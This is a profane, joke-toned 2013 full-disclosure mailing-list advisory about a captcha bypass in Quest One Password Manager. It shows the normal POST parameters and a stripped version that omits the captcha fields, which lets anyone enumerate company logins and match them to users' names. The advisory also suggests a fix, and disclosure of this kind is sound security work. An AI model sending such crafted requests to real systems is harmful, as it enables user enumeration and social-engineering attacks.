[<prev] [next>] [day] [month] [year] [list]
Message-Id: <8D09CA68B736C08-724-2E4B9@webmail-d297.sysops.aol.com>
Date: Mon, 21 Oct 2013 14:57:38 -0400 (EDT)
From: Johnny Bravo <j_o_h_n_n_y.b_r_a_v_o@....com>
To: full-disclosure@...ts.grok.org.uk
Subject: Wicked Smaht O-Dayuh in Quest One(tm) Password
Manager
-= [ Disclosure ]=-
Filing Date: Today
Issue Tracking Numbah: 20747
Discoverorer: Johnny Bravo
-=[ Background ]=-
Quest made a password management web thing. Dell bought Quest. Dell
offers Quest One(tm) Password Manager for $5/user.
http://software.dell.com/products/password-manager/. (Oddly, this is
not a joke.)
-=[ Issue ]=-
To use the web application you need to know your domain, username, and
the value of the presented captcha. You submit that, correctly, and the
web application will present you with the user's full name and some
options.
Today we will just talk about that bit there. You do not need to
actually know the value of the captcha. Someone who is really bored
could easily enumerate logins and match them to a user's name.
-=[ Attack ]=-
On the POST request you can just remove the captcha bits. Pretty
fucking l33t. This is the kind of thing that HFG would produce. Or
maybe Gobbles. Or, more likely, se7en. And no, I didn't find this in
the "Snowden docs" although this may be an NSA backdoor... you decide!
On to the attack. The POST data normally includes the following
parameters:
ScenarioActionId=42696720-7368-6974-2070-726F64756374&UserName=domain%5Cu
ser&Search=false&CaptchaType=Captcha&UseCaptchaEveryTime=True&CaptchaResp
onse=SelfCleaningVagina
l33t hackers would send these parameters:
ScenarioActionId=42696720-7368-6974-2070-726F64756374&UserName=domain%5Cu
ser&Search=false
-=[ Fix ]=-
(This section is for the developers who wrote the software)
Write the code such that, oh, I don't know, it actually checks to
ensure the fucking captcha is used? Someone did this on one of the
other pages in the app. Perhaps use the code from there? If it's not
too much to ask that is.
(This section is for product owners)
Really, you bought this? Really? Really? Really?
(This section is for users)
Yes, that's right, any moron on the internets can discover your company
login id and pair that with your name if you work at a place
unfortunate enough to utilize this product. If your company doesn't
have resources to create this app themselves, they've probably
outsourced your helpdesk too, which means you're about to get pwn3d via
some fairly lame social engineering. Enjoy that.
-=[ Greetz ]=-
Dell, Quest, and the security company that either uses this shit
internally or resells it, or uses it and resells it.
Brought to youse guys by,
Johnny, Johnny Bravo
PS If you haven't seen my tips on picking up the chicks, check it out
on the youtube http://www.youtube.com/watch?v=xnGnl-UElVA.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists